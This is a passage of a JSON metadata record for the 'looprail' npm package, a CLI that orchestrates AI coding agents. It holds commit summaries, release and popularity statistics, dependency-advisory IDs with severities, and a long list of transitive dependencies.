"oid": "6d0e0859ce4ec4c616b66d6b72c797b510ac4f11",
"body": "…ng triage\n\nRuns queue.yaml's items sequentially (one shared working directory -\nconcurrent runs would corrupt each other's checkout), each item either\nverifying or PARKING at its gate: an unattended queue must never hang\novernight on a gate nobody is watching, so items with no gate_timeout\nof their\n[…]\ne same\ngoal-override posture resume already had), `- file:`, or both.\n\nThis is the workflow a bare agent CLI structurally cannot offer:\nit needs a human present for every approval and every next task.",
"is_bot": false,
"headline": "feat(cli): looprail queue - run a list of goals unattended with morni…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T22:19:01Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "d8887af45c8fdf0c52f843461d9f24c18479ad93",
"body": "looprail init's templates hardcoded `run: npm test`, leaving every\nnon-npm project (and any npm project the user didn't hand-edit) with a\ntester that either fails instantly or, worse, exits 0 without testing\nanything and \"verifies\" unverified work.\n\ninit now detects the repo's actual test command fr\n[…]\ne provenance (\"detected\ntest command: go test ./... (go.mod)\") so a wrong guess is immediately\nvisible and correctable. No match keeps the old npm test default with\nits swap-it comment, byte-for-byte.",
"is_bot": false,
"headline": "feat(init): wire the scaffolded tester to the repo's real test command",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T22:06:31Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "6d9649cf1b253d8fd0e4ac4d66c69265ac82e800",
"body": "…minal, gates answerable cross-process\n\nThe run's lifetime was coupled to a terminal and a viewing session:\nclosing either killed the run, and a gate was only answerable from the\nsame process that was running the loop (the in-process registry). The\ngate-waiting.json marker was being written but neve\n[…]\npletion signal.\n\nProven end-to-end against the real CLI: run -d -> terminal closed ->\ngate visible in mission control -> approved over HTTP from a separate\nprocess -> verified -> child exited cleanly.",
"is_bot": false,
"headline": "feat(cli,dashboard): detached runs - looprail run -d survives the ter…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T21:49:51Z",
"body_truncated": true,
"is_coding_agent": false
}
],
"releases_count": 16,
"commits_last_year": 340,
"latest_release_at": "2026-07-17T01:48:30Z",
"latest_release_tag": "v0.11.0",
"releases_from_tags": false,
"days_since_last_push": 2,
"active_weeks_last_year": 16,
"days_since_latest_release": 4,
"mean_days_between_releases": 1
},
"community": {
"has_readme": true,
"has_license": true,
"has_description": true,
"has_contributing": true,
"health_percentage": 71,
"has_issue_template": false,
"has_code_of_conduct": false,
"has_pull_request_template": false
},
"ecosystem": {
"packages": [
{
"name": "looprail",
"exists": true,
"license": "MIT",
"keywords": [
"ai",
"agent",
"agents",
"llm",
"orchestration",
"claude",
"codex",
"aider",
"loop",
"cli"
],
"ecosystem": "npm",
"matches_repo": true,
"registry_url": "https://www.npmjs.com/package/looprail",
"is_deprecated": false,
"latest_version": "0.11.0",
"repository_url": "https://github.com/saimeda32/looprail",
"versions_count": 15,
"total_downloads": null,
"dependents_count": null,
"deprecation_note": null,
"maintainers_count": 1,
"monthly_downloads": 2490,
"first_published_at": "2026-07-05T22:35:39.477000Z",
"latest_published_at": "2026-07-17T01:49:18.588000Z",
"latest_version_yanked": null,
"days_since_latest_publish": 4
}
]
},
"popularity": {
"forks": 0,
"stars": 0,
"watchers": 0,
"fork_history": {
"days": [],
"complete": true,
"collected": 0,
"total_forks": 0
},
"star_history": {
"days": [],
"complete": true,
"collected": 0,
"total_stars": 0
},
"open_issues_and_prs": 9
},
"ai_readiness": {
"has_nix": false,
"example_dirs": [
"examples"
],
"has_llms_txt": false,
"has_dockerfile": false,
"has_mcp_signal": true,
"bootstrap_files": [],
"api_schema_files": [],
"has_devcontainer": false,
"typecheck_configs": [
"tsconfig.json"
],
"toolchain_manifests": [],
"largest_source_bytes": 89014,
"source_files_sampled": 233,
"oversized_source_files": 2,
"agent_instruction_files": [],
"agent_instruction_max_bytes": null
},
"dependencies": {
"manifests": [
"package.json"
],
"advisories": {
"error": null,
"scope": "repository_graph",
"source": "osv",
"findings": [
{
"name": "vitest",
"direct": false,
"version": "2.1.9",
"severity": "critical",
"ecosystem": "npm",
"cvss_score": 9.8,
"advisory_ids": [
"GHSA-5xrq-8626-4rwp"
],
"fixed_version": "4.1.0",
"advisory_count": 1,
"oldest_advisory_days": 50
},
{
"name": "vite",
"direct": false,
"version": "5.4.21",
"severity": "high",
"ecosystem": "npm",
"cvss_score": 7.5,
"advisory_ids": [
"GHSA-4w7w-66w2-5vf9",
"GHSA-fx2h-pf6j-xcff",
"GHSA-v6wh-96g9-6wx3"
],
"fixed_version": "8.0.16",
"advisory_count": 3,
"oldest_advisory_days": 106
},
{
"name": "@hono/node-server",
"direct": false,
"version": "1.19.14",
"severity": "moderate",
"ecosystem": "npm",
"cvss_score": 5.9,
"advisory_ids": [
"GHSA-frvp-7c67-39w9"
],
"fixed_version": "2.0.5",
"advisory_count": 1,
"oldest_advisory_days": 0
},
{
"name": "esbuild",
"direct": false,
"version": "0.21.5",
"severity": "moderate",
"ecosystem": "npm",
"cvss_score": 5.3,
"advisory_ids": [
"GHSA-67mh-4wv8-2f99"
],
"fixed_version": "0.25.0",
"advisory_count": 1,
"oldest_advisory_days": 526
}
],
"collected": true,
"truncated": false,
"by_severity": {
"high": 1,
"critical": 1,
"moderate": 2
},
"advisory_count": 6,
"affected_count": 4,
"assessed_count": 307,
"assessed_package": null,
"unassessed_count": 0,
"direct_affected_count": 0
},
"ecosystems": [
"npm"
],
"dependencies": [
{
"name": "@modelcontextprotocol/sdk",
"manifest": "package.json",
"ecosystem": "npm",
"version_constraint": "^1.29.0"
},
{
"name": "commander",
"manifest": "package.json",
"ecosystem": "npm",
"version_constraint": "^12.1.0"
},
{
"name": "execa",
"manifest": "package.json",
"ecosystem": "npm",
"version_constraint": "^9.0.0"
},
{
"name": "picocolors",
"manifest": "package.json",
"ecosystem": "npm",
"version_constraint": "^1.1.1"
},
{
"name": "yaml",
"manifest": "package.json",
"ecosystem": "npm",
"version_constraint": "^2.4.0"
},
{
"name": "zod",
"manifest": "package.json",
"ecosystem": "npm",
"version_constraint": "^4.4.0"
}
],
"all_dependencies": {
"error": null,
"source": "github-sbom",
"packages": [
{
"name": "@modelcontextprotocol/sdk",
"direct": true,
"version": "1.29.0",
"ecosystem": "npm"
},
{
"name": "commander",
"direct": true,
"version": "12.1.0",
"ecosystem": "npm"
},
{
"name": "execa",
"direct": true,
"version": "9.6.1",
"ecosystem": "npm"
},
{
"name": "picocolors",
"direct": true,
"version": "1.1.1",
"ecosystem": "npm"
},
{
"name": "yaml",
"direct": true,
"version": "2.9.0",
"ecosystem": "npm"
},
{
"name": "zod",
"direct": true,
"version": "4.4.3",
"ecosystem": "npm"
},
{
"name": "@esbuild/aix-ppc64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/aix-ppc64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/android-arm",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/android-arm",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/android-arm64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/android-arm64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/android-x64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/android-x64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/darwin-arm64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/darwin-arm64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/darwin-x64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/darwin-x64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/freebsd-arm64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/freebsd-arm64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/freebsd-x64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/freebsd-x64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-arm",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-arm",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-arm64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-arm64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-ia32",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-ia32",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-loong64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-loong64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-mips64el",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-mips64el",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-ppc64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-ppc64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-riscv64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-riscv64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-s390x",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-s390x",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-x64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/linux-x64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/netbsd-arm64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/netbsd-x64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/netbsd-x64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/openbsd-arm64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/openbsd-x64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/openbsd-x64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/openharmony-arm64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/sunos-x64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/sunos-x64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/win32-arm64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/win32-arm64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/win32-ia32",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/win32-ia32",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@esbuild/win32-x64",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "@esbuild/win32-x64",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "@eslint-community/eslint-utils",
"direct": false,
"version": "4.9.1",
"ecosystem": "npm"
},
{
"name": "@eslint-community/regexpp",
"direct": false,
"version": "4.12.2",
"ecosystem": "npm"
},
{
"name": "@eslint/config-array",
"direct": false,
"version": "0.23.5",
"ecosystem": "npm"
},
{
"name": "@eslint/config-helpers",
"direct": false,
"version": "0.6.0",
"ecosystem": "npm"
},
{
"name": "@eslint/core",
"direct": false,
"version": "1.2.1",
"ecosystem": "npm"
},
{
"name": "@eslint/js",
"direct": false,
"version": "10.0.1",
"ecosystem": "npm"
},
{
"name": "@eslint/object-schema",
"direct": false,
"version": "3.0.5",
"ecosystem": "npm"
},
{
"name": "@eslint/plugin-kit",
"direct": false,
"version": "0.7.2",
"ecosystem": "npm"
},
{
"name": "@hono/node-server",
"direct": false,
"version": "1.19.14",
"ecosystem": "npm"
},
{
"name": "@humanfs/core",
"direct": false,
"version": "0.19.2",
"ecosystem": "npm"
},
{
"name": "@humanfs/node",
"direct": false,
"version": "0.16.8",
"ecosystem": "npm"
},
{
"name": "@humanfs/types",
"direct": false,
"version": "0.15.0",
"ecosystem": "npm"
},
{
"name": "@humanwhocodes/module-importer",
"direct": false,
"version": "1.0.1",
"ecosystem": "npm"
},
{
"name": "@humanwhocodes/retry",
"direct": false,
"version": "0.4.3",
"ecosystem": "npm"
},
{
"name": "@jridgewell/sourcemap-codec",
"direct": false,
"version": "1.5.5",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-android-arm-eabi",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-android-arm64",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-darwin-arm64",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-darwin-x64",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-freebsd-arm64",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-freebsd-x64",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-arm-gnueabihf",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-arm-musleabihf",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-arm64-gnu",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-arm64-musl",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-loong64-gnu",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-loong64-musl",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-ppc64-gnu",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-ppc64-musl",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-riscv64-gnu",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-riscv64-musl",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-s390x-gnu",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-x64-gnu",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-linux-x64-musl",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-openbsd-x64",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-openharmony-arm64",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-win32-arm64-msvc",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-win32-ia32-msvc",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-win32-x64-gnu",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@rollup/rollup-win32-x64-msvc",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "@sec-ant/readable-stream",
"direct": false,
"version": "0.4.1",
"ecosystem": "npm"
},
{
"name": "@sindresorhus/merge-streams",
"direct": false,
"version": "4.0.0",
"ecosystem": "npm"
},
{
"name": "@types/esrecurse",
"direct": false,
"version": "4.3.1",
"ecosystem": "npm"
},
{
"name": "@types/estree",
"direct": false,
"version": "1.0.9",
"ecosystem": "npm"
},
{
"name": "@types/json-schema",
"direct": false,
"version": "7.0.15",
"ecosystem": "npm"
},
{
"name": "@types/node",
"direct": false,
"version": "20.19.43",
"ecosystem": "npm"
},
{
"name": "@typescript-eslint/eslint-plugin",
"direct": false,
"version": "8.62.1",
"ecosystem": "npm"
},
{
"name": "@typescript-eslint/parser",
"direct": false,
"version": "8.62.1",
"ecosystem": "npm"
},
{
"name": "@typescript-eslint/project-service",
"direct": false,
"version": "8.62.1",
"ecosystem": "npm"
},
{
"name": "@typescript-eslint/scope-manager",
"direct": false,
"version": "8.62.1",
"ecosystem": "npm"
},
{
"name": "@typescript-eslint/tsconfig-utils",
"direct": false,
"version": "8.62.1",
"ecosystem": "npm"
},
{
"name": "@typescript-eslint/type-utils",
"direct": false,
"version": "8.62.1",
"ecosystem": "npm"
},
{
"name": "@typescript-eslint/types",
"direct": false,
"version": "8.62.1",
"ecosystem": "npm"
},
{
"name": "@typescript-eslint/typescript-estree",
"direct": false,
"version": "8.62.1",
"ecosystem": "npm"
},
{
"name": "@typescript-eslint/utils",
"direct": false,
"version": "8.62.1",
"ecosystem": "npm"
},
{
"name": "@typescript-eslint/visitor-keys",
"direct": false,
"version": "8.62.1",
"ecosystem": "npm"
},
{
"name": "@vitest/expect",
"direct": false,
"version": "2.1.9",
"ecosystem": "npm"
},
{
"name": "@vitest/mocker",
"direct": false,
"version": "2.1.9",
"ecosystem": "npm"
},
{
"name": "@vitest/pretty-format",
"direct": false,
"version": "2.1.9",
"ecosystem": "npm"
},
{
"name": "@vitest/runner",
"direct": false,
"version": "2.1.9",
"ecosystem": "npm"
},
{
"name": "@vitest/snapshot",
"direct": false,
"version": "2.1.9",
"ecosystem": "npm"
},
{
"name": "@vitest/spy",
"direct": false,
"version": "2.1.9",
"ecosystem": "npm"
},
{
"name": "@vitest/utils",
"direct": false,
"version": "2.1.9",
"ecosystem": "npm"
},
{
"name": "accepts",
"direct": false,
"version": "2.0.0",
"ecosystem": "npm"
},
{
"name": "acorn",
"direct": false,
"version": "8.17.0",
"ecosystem": "npm"
},
{
"name": "acorn-jsx",
"direct": false,
"version": "5.3.2",
"ecosystem": "npm"
},
{
"name": "ajv",
"direct": false,
"version": "6.15.0",
"ecosystem": "npm"
},
{
"name": "ajv",
"direct": false,
"version": "8.20.0",
"ecosystem": "npm"
},
{
"name": "ajv-formats",
"direct": false,
"version": "3.0.1",
"ecosystem": "npm"
},
{
"name": "assertion-error",
"direct": false,
"version": "2.0.1",
"ecosystem": "npm"
},
{
"name": "balanced-match",
"direct": false,
"version": "4.0.4",
"ecosystem": "npm"
},
{
"name": "body-parser",
"direct": false,
"version": "2.3.0",
"ecosystem": "npm"
},
{
"name": "brace-expansion",
"direct": false,
"version": "5.0.7",
"ecosystem": "npm"
},
{
"name": "bytes",
"direct": false,
"version": "3.1.2",
"ecosystem": "npm"
},
{
"name": "cac",
"direct": false,
"version": "6.7.14",
"ecosystem": "npm"
},
{
"name": "call-bind-apply-helpers",
"direct": false,
"version": "1.0.2",
"ecosystem": "npm"
},
{
"name": "call-bound",
"direct": false,
"version": "1.0.4",
"ecosystem": "npm"
},
{
"name": "chai",
"direct": false,
"version": "5.3.3",
"ecosystem": "npm"
},
{
"name": "check-error",
"direct": false,
"version": "2.1.3",
"ecosystem": "npm"
},
{
"name": "content-disposition",
"direct": false,
"version": "1.1.0",
"ecosystem": "npm"
},
{
"name": "content-type",
"direct": false,
"version": "1.0.5",
"ecosystem": "npm"
},
{
"name": "content-type",
"direct": false,
"version": "2.0.0",
"ecosystem": "npm"
},
{
"name": "cookie",
"direct": false,
"version": "0.7.2",
"ecosystem": "npm"
},
{
"name": "cookie-signature",
"direct": false,
"version": "1.2.2",
"ecosystem": "npm"
},
{
"name": "cors",
"direct": false,
"version": "2.8.6",
"ecosystem": "npm"
},
{
"name": "cross-spawn",
"direct": false,
"version": "7.0.6",
"ecosystem": "npm"
},
{
"name": "debug",
"direct": false,
"version": "4.4.3",
"ecosystem": "npm"
},
{
"name": "deep-eql",
"direct": false,
"version": "5.0.2",
"ecosystem": "npm"
},
{
"name": "deep-is",
"direct": false,
"version": "0.1.4",
"ecosystem": "npm"
},
{
"name": "depd",
"direct": false,
"version": "2.0.0",
"ecosystem": "npm"
},
{
"name": "dunder-proto",
"direct": false,
"version": "1.0.1",
"ecosystem": "npm"
},
{
"name": "ee-first",
"direct": false,
"version": "1.1.1",
"ecosystem": "npm"
},
{
"name": "encodeurl",
"direct": false,
"version": "2.0.0",
"ecosystem": "npm"
},
{
"name": "es-define-property",
"direct": false,
"version": "1.0.1",
"ecosystem": "npm"
},
{
"name": "es-errors",
"direct": false,
"version": "1.3.0",
"ecosystem": "npm"
},
{
"name": "es-module-lexer",
"direct": false,
"version": "1.7.0",
"ecosystem": "npm"
},
{
"name": "es-object-atoms",
"direct": false,
"version": "1.1.2",
"ecosystem": "npm"
},
{
"name": "esbuild",
"direct": false,
"version": "0.21.5",
"ecosystem": "npm"
},
{
"name": "esbuild",
"direct": false,
"version": "0.28.1",
"ecosystem": "npm"
},
{
"name": "escape-html",
"direct": false,
"version": "1.0.3",
"ecosystem": "npm"
},
{
"name": "escape-string-regexp",
"direct": false,
"version": "4.0.0",
"ecosystem": "npm"
},
{
"name": "eslint",
"direct": false,
"version": "10.6.0",
"ecosystem": "npm"
},
{
"name": "eslint-scope",
"direct": false,
"version": "9.1.2",
"ecosystem": "npm"
},
{
"name": "eslint-visitor-keys",
"direct": false,
"version": "3.4.3",
"ecosystem": "npm"
},
{
"name": "eslint-visitor-keys",
"direct": false,
"version": "5.0.1",
"ecosystem": "npm"
},
{
"name": "espree",
"direct": false,
"version": "11.2.0",
"ecosystem": "npm"
},
{
"name": "esquery",
"direct": false,
"version": "1.7.0",
"ecosystem": "npm"
},
{
"name": "esrecurse",
"direct": false,
"version": "4.3.0",
"ecosystem": "npm"
},
{
"name": "estraverse",
"direct": false,
"version": "5.3.0",
"ecosystem": "npm"
},
{
"name": "estree-walker",
"direct": false,
"version": "3.0.3",
"ecosystem": "npm"
},
{
"name": "esutils",
"direct": false,
"version": "2.0.3",
"ecosystem": "npm"
},
{
"name": "etag",
"direct": false,
"version": "1.8.1",
"ecosystem": "npm"
},
{
"name": "eventsource",
"direct": false,
"version": "3.0.7",
"ecosystem": "npm"
},
{
"name": "eventsource-parser",
"direct": false,
"version": "3.1.0",
"ecosystem": "npm"
},
{
"name": "expect-type",
"direct": false,
"version": "1.4.0",
"ecosystem": "npm"
},
{
"name": "express",
"direct": false,
"version": "5.2.1",
"ecosystem": "npm"
},
{
"name": "express-rate-limit",
"direct": false,
"version": "8.5.2",
"ecosystem": "npm"
},
{
"name": "fast-deep-equal",
"direct": false,
"version": "3.1.3",
"ecosystem": "npm"
},
{
"name": "fast-json-stable-stringify",
"direct": false,
"version": "2.1.0",
"ecosystem": "npm"
},
{
"name": "fast-levenshtein",
"direct": false,
"version": "2.0.6",
"ecosystem": "npm"
},
{
"name": "fast-uri",
"direct": false,
"version": "3.1.3",
"ecosystem": "npm"
},
{
"name": "fdir",
"direct": false,
"version": "6.5.0",
"ecosystem": "npm"
},
{
"name": "figures",
"direct": false,
"version": "6.1.0",
"ecosystem": "npm"
},
{
"name": "file-entry-cache",
"direct": false,
"version": "8.0.0",
"ecosystem": "npm"
},
{
"name": "finalhandler",
"direct": false,
"version": "2.1.1",
"ecosystem": "npm"
},
{
"name": "find-up",
"direct": false,
"version": "5.0.0",
"ecosystem": "npm"
},
{
"name": "flat-cache",
"direct": false,
"version": "4.0.1",
"ecosystem": "npm"
},
{
"name": "flatted",
"direct": false,
"version": "3.4.2",
"ecosystem": "npm"
},
{
"name": "forwarded",
"direct": false,
"version": "0.2.0",
"ecosystem": "npm"
},
{
"name": "fresh",
"direct": false,
"version": "2.0.0",
"ecosystem": "npm"
},
{
"name": "fsevents",
"direct": false,
"version": "2.3.3",
"ecosystem": "npm"
},
{
"name": "function-bind",
"direct": false,
"version": "1.1.2",
"ecosystem": "npm"
},
{
"name": "get-intrinsic",
"direct": false,
"version": "1.3.0",
"ecosystem": "npm"
},
{
"name": "get-proto",
"direct": false,
"version": "1.0.1",
"ecosystem": "npm"
},
{
"name": "get-stream",
"direct": false,
"version": "9.0.1",
"ecosystem": "npm"
},
{
"name": "glob-parent",
"direct": false,
"version": "6.0.2",
"ecosystem": "npm"
},
{
"name": "gopd",
"direct": false,
"version": "1.2.0",
"ecosystem": "npm"
},
{
"name": "has-symbols",
"direct": false,
"version": "1.1.0",
"ecosystem": "npm"
},
{
"name": "hasown",
"direct": false,
"version": "2.0.4",
"ecosystem": "npm"
},
{
"name": "hono",
"direct": false,
"version": "4.12.27",
"ecosystem": "npm"
},
{
"name": "http-errors",
"direct": false,
"version": "2.0.1",
"ecosystem": "npm"
},
{
"name": "human-signals",
"direct": false,
"version": "8.0.1",
"ecosystem": "npm"
},
{
"name": "iconv-lite",
"direct": false,
"version": "0.7.3",
"ecosystem": "npm"
},
{
"name": "ignore",
"direct": false,
"version": "5.3.2",
"ecosystem": "npm"
},
{
"name": "ignore",
"direct": false,
"version": "7.0.5",
"ecosystem": "npm"
},
{
"name": "imurmurhash",
"direct": false,
"version": "0.1.4",
"ecosystem": "npm"
},
{
"name": "inherits",
"direct": false,
"version": "2.0.4",
"ecosystem": "npm"
},
{
"name": "ip-address",
"direct": false,
"version": "10.2.0",
"ecosystem": "npm"
},
{
"name": "ipaddr.js",
"direct": false,
"version": "1.9.1",
"ecosystem": "npm"
},
{
"name": "is-extglob",
"direct": false,
"version": "2.1.1",
"ecosystem": "npm"
},
{
"name": "is-glob",
"direct": false,
"version": "4.0.3",
"ecosystem": "npm"
},
{
"name": "is-plain-obj",
"direct": false,
"version": "4.1.0",
"ecosystem": "npm"
},
{
"name": "is-promise",
"direct": false,
"version": "4.0.0",
"ecosystem": "npm"
},
{
"name": "is-stream",
"direct": false,
"version": "4.0.1",
"ecosystem": "npm"
},
{
"name": "is-unicode-supported",
"direct": false,
"version": "2.1.0",
"ecosystem": "npm"
},
{
"name": "isexe",
"direct": false,
"version": "2.0.0",
"ecosystem": "npm"
},
{
"name": "jose",
"direct": false,
"version": "6.2.3",
"ecosystem": "npm"
},
{
"name": "json-buffer",
"direct": false,
"version": "3.0.1",
"ecosystem": "npm"
},
{
"name": "json-schema-traverse",
"direct": false,
"version": "0.4.1",
"ecosystem": "npm"
},
{
"name": "json-schema-traverse",
"direct": false,
"version": "1.0.0",
"ecosystem": "npm"
},
{
"name": "json-schema-typed",
"direct": false,
"version": "8.0.2",
"ecosystem": "npm"
},
{
"name": "json-stable-stringify-without-jsonify",
"direct": false,
"version": "1.0.1",
"ecosystem": "npm"
},
{
"name": "keyv",
"direct": false,
"version": "4.5.4",
"ecosystem": "npm"
},
{
"name": "levn",
"direct": false,
"version": "0.4.1",
"ecosystem": "npm"
},
{
"name": "locate-path",
"direct": false,
"version": "6.0.0",
"ecosystem": "npm"
},
{
"name": "loupe",
"direct": false,
"version": "3.2.1",
"ecosystem": "npm"
},
{
"name": "magic-string",
"direct": false,
"version": "0.30.21",
"ecosystem": "npm"
},
{
"name": "math-intrinsics",
"direct": false,
"version": "1.1.0",
"ecosystem": "npm"
},
{
"name": "media-typer",
"direct": false,
"version": "1.1.0",
"ecosystem": "npm"
},
{
"name": "merge-descriptors",
"direct": false,
"version": "2.0.0",
"ecosystem": "npm"
},
{
"name": "mime-db",
"direct": false,
"version": "1.54.0",
"ecosystem": "npm"
},
{
"name": "mime-types",
"direct": false,
"version": "3.0.2",
"ecosystem": "npm"
},
{
"name": "minimatch",
"direct": false,
"version": "10.2.5",
"ecosystem": "npm"
},
{
"name": "ms",
"direct": false,
"version": "2.1.3",
"ecosystem": "npm"
},
{
"name": "nanoid",
"direct": false,
"version": "3.3.15",
"ecosystem": "npm"
},
{
"name": "natural-compare",
"direct": false,
"version": "1.4.0",
"ecosystem": "npm"
},
{
"name": "negotiator",
"direct": false,
"version": "1.0.0",
"ecosystem": "npm"
},
{
"name": "npm-run-path",
"direct": false,
"version": "6.0.0",
"ecosystem": "npm"
},
{
"name": "object-assign",
"direct": false,
"version": "4.1.1",
"ecosystem": "npm"
},
{
"name": "object-inspect",
"direct": false,
"version": "1.13.4",
"ecosystem": "npm"
},
{
"name": "on-finished",
"direct": false,
"version": "2.4.1",
"ecosystem": "npm"
},
{
"name": "once",
"direct": false,
"version": "1.4.0",
"ecosystem": "npm"
},
{
"name": "optionator",
"direct": false,
"version": "0.9.4",
"ecosystem": "npm"
},
{
"name": "p-limit",
"direct": false,
"version": "3.1.0",
"ecosystem": "npm"
},
{
"name": "p-locate",
"direct": false,
"version": "5.0.0",
"ecosystem": "npm"
},
{
"name": "parse-ms",
"direct": false,
"version": "4.0.0",
"ecosystem": "npm"
},
{
"name": "parseurl",
"direct": false,
"version": "1.3.3",
"ecosystem": "npm"
},
{
"name": "path-exists",
"direct": false,
"version": "4.0.0",
"ecosystem": "npm"
},
{
"name": "path-key",
"direct": false,
"version": "3.1.1",
"ecosystem": "npm"
},
{
"name": "path-key",
"direct": false,
"version": "4.0.0",
"ecosystem": "npm"
},
{
"name": "path-to-regexp",
"direct": false,
"version": "8.4.2",
"ecosystem": "npm"
},
{
